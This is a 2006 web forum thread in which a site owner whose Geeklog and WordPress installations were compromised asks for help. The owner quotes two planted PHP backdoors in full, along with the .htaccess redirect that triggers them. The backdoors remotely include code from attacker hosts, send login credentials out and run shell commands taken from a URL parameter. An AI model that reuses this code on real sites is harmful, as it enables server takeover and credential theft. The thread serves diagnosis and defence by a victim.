Forum Subject: hacking a family site

Posted on: 07/17/06 12:55pm
By: Anonymous (hacked)

I've recently found these files strewn throughout my system dirs by various names and .htaccess files providing redirects to them from a 404 (or something like that):
first file:

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

second file:

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

and the .htaccess file:

Options -MultiViews
ErrorDocument 404 /mysite/geeklogdir/plugins/someplugin/includes.php

what's up with that? how could these files have got there and what do they do? I'm deleting them as I find them. They are in a whold bunch of directories. ...and I don't have a clue how to read server logs.

hacking a family site

Posted on: 07/17/06 03:43pm
By: Dirk

Which Geeklog version are you on?

Unfortunately, we had a few issues recently that allowed attackers to execute arbitraty code - which means that they could do just about anything, including creating or uploading new files.

bye, Dirk

hacking a family site

Posted on: 07/17/06 04:22pm
By: Anonymous (hacked)

I found the files while upgrading to 1.4sr5, but the modification date of the files shows that they were created when I was still running 1.3.11sr1.

upgrade went fine by the way.

the geeklog dir was inside the doc root, but it was (per the install instructions) renamed and password protected. The files I mentioned above were found in this password protected dir as well as many publicly accessible directories.

I found these files accross 3 domains, 2 subdomains, all on the same server obvoiusly, involving not only geeklog installations but 2 word press installations as well. I found them mostly in any directories named: data; backups; logs; userphotos; articles; default; and a few others that I can't remember.

HOLY CRAP! I just found that the username and password in the config.php file (of the installation with the gl dir outside the web root) was changed. the new username was also added to the database with all priveledges. wtf?!

hacking a family site

Posted on: 07/17/06 04:54pm
By: Dirk

Sounds really bad

The password protection will only help against access from the outside (e.g. via the browser), but won't help when you can run your own PHP scripts (or Geeklog itself wouldn't be able to access the files in the password-protected directories). So, as I wrote above, once you can execute your own PHP code on someone else's server, pretty much everything is possible ...

bye, Dirk